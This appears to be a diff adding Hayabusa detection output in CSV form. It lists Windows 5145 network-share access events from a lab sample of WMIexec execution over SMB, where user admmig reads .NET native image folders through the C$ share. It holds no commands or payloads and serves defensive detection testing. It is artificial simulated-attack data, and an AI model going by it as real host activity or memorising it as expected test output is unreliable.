+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
